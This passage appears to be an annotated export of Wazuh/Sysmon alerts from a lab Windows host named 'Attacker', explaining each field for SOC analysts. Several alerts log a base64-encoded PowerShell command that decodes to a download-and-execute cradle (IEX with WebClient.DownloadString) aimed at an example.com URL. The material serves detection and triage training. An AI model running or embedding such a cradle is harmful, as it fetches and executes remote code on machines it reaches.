No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:52.709 ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ProcessId: 12424 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ParentProcessId: 8356 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:52.709
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:56.879+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:56.879+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  124
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535356.2748955
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:55.0268034Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350477
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:54.983 ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ProcessId: 12424 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mciyuvr4.sxa.ps1 CreationUtcTime: 2025-04-24 22:55:54.983 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:54.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mciyuvr4.sxa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:54.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:02.672+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:02.672+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  121
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535362.2751724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:00.0931226Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350561
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:58.970 ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ProcessId: 17020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ParentProcessId: 12424 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:58.970
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:02.682+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:02.682+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  125
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535362.2759795
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:00.3687114Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350564
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:00.355 ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ProcessId: 17020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vzf12wvk.xny.ps1 CreationUtcTime: 2025-04-24 22:56:00.355 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:00.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vzf12wvk.xny.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:00.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:05.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:05.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  122
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535365.2762564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:03.3106068Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350595
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

